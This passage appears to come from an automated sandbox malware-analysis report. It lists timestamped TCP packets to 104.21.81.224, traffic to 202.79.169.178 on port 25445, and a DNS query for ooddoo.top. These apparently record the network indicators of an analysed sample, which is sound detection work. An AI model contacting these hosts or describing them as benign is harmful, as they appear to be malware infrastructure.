                                                                                                                  Dec 29, 2024 16:09:33.095587015 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.102977037 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.103010893 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.103040934 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.103049040 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.103216887 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.103218079 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.110335112 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.110356092 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.110394955 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.110399961 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.110424995 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.110444069 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.117319107 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.117340088 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.117387056 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.117398024 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.117408991 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.117434025 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.124824047 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.124845028 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.124887943 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.124895096 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.124922991 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.124932051 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.131381989 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.131416082 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.131449938 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.131457090 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.131474018 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.131500959 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.292067051 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.292090893 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.292144060 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.292162895 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.292200089 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.292215109 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.299585104 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.299607992 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.299669027 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.299679041 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.299746037 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.306176901 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.306196928 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.306252003 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.306262970 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.306313992 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.313646078 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.313679934 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.313710928 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.313720942 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.313750982 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.313771009 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.321016073 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.321037054 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.321093082 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.321100950 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.321154118 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.327971935 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.327994108 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.328052044 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.328062057 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.328085899 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.328099012 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.335480928 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.335503101 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.335556030 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.335570097 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.335669041 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.342045069 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.342070103 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.342116117 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.342129946 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.342140913 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.342185974 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.502789974 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.502814054 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.502959967 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.502975941 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.503031015 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.510175943 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.510196924 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.510261059 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.510270119 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.510310888 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.516697884 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.516719103 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.516768932 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.516777992 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.516819000 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.524223089 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.524245024 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.524311066 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.524322033 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.524367094 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.531579971 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.531610966 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.531652927 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.531663895 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.531680107 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.531877041 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.538692951 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.538717031 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.538759947 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.538774967 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.538788080 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.538842916 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.546119928 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.546139956 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.546191931 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.546202898 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.546220064 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.546242952 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.552635908 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.552656889 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.552719116 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.552731991 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.552803040 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.713450909 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.713479996 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.713535070 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.713563919 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.713578939 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.713675022 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.720766068 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.720787048 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.720824957 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.720834017 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.720860004 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.720876932 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.728286028 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.728306055 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.728439093 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.728446960 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.728530884 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.734800100 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.734829903 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.734869957 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.734877110 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.734905958 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.734905958 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.742165089 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.742187023 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.742252111 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.742259979 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.742300034 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.749295950 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.749315977 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.749452114 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.749452114 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.749459982 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.749603987 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.756730080 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.756750107 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.756793976 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.756799936 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.756819010 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.756841898 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.764172077 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.764192104 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.764245987 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.764252901 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.764261961 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.764287949 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.924101114 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.924128056 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.924231052 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.924258947 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.924309015 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.931488991 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.931509018 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.931587934 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.931596994 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.931639910 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.938853025 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.938874960 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.938935995 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.938945055 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.938977003 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.938983917 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.945410967 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.945431948 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.945487976 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.945497990 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.945508957 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.945620060 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.952948093 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.952969074 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.953047037 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.953057051 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.953067064 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.953325033 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.959898949 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.959918976 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.959960938 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.959970951 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.959984064 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.960012913 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.967309952 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.967339993 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.967381954 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.967391014 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.967431068 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.967449903 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.974776030 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.974796057 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.974831104 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.974842072 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:33.974864006 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:33.974884987 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.134511948 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.134538889 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.134586096 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.134608984 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.134622097 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.134780884 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.141933918 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.141982079 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.142004013 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.142011881 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.142041922 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.142052889 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.149399996 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.149416924 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.149477005 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.149483919 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.149533987 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.155935049 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.155952930 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.156021118 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.156028986 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.156066895 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.163424015 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.163440943 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.163516998 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.163525105 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.163566113 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.170420885 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.170438051 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.170499086 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.170506954 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.170557022 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.177802086 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.177818060 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.177901030 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.177908897 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.177951097 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.185414076 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.185429096 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.185488939 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.185497046 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.185534000 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.345069885 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.345098019 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.345165968 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.345176935 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.345225096 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.345242977 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.352581024 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.352596998 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.352662086 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.352669001 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.352685928 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.354299068 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.359960079 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.359975100 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.360032082 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.360043049 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.360080957 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.360100985 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.366492033 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.366508007 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.366554976 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.366563082 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.366588116 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.366606951 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.373986006 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.374001026 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.374044895 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.374052048 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.374078989 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.374113083 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.380961895 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.380978107 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.381041050 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.381048918 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.381091118 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.388446093 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.388469934 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.388524055 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.388536930 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.388547897 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.388551950 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:34.388593912 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.388741970 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:34.388761044 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:36.455041885 CET4974125445192.168.2.5202.79.169.178
                                                                                                                  Dec 29, 2024 16:09:36.580394983 CET2544549741202.79.169.178192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:36.580472946 CET4974125445192.168.2.5202.79.169.178
                                                                                                                  Dec 29, 2024 16:09:38.896094084 CET4974125445192.168.2.5202.79.169.178
                                                                                                                  Dec 29, 2024 16:09:39.017039061 CET2544549741202.79.169.178192.168.2.5
                                                                                                                  Dec 29, 2024 16:11:15.303255081 CET4971780192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:11:15.424798965 CET8049717104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:11:15.424871922 CET4971780192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:12:39.076240063 CET4974125445192.168.2.5202.79.169.178
                                                                                                                  Dec 29, 2024 16:12:39.197310925 CET2544549741202.79.169.178192.168.2.5

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 29, 2024 16:09:25.286161900 CET6102153192.168.2.51.1.1.1
                                                                                                                  Dec 29, 2024 16:09:25.425190926 CET53610211.1.1.1192.168.2.5

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Dec 29, 2024 16:09:25.286161900 CET192.168.2.51.1.1.10x41d7Standard query (0)ooddoo.topA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

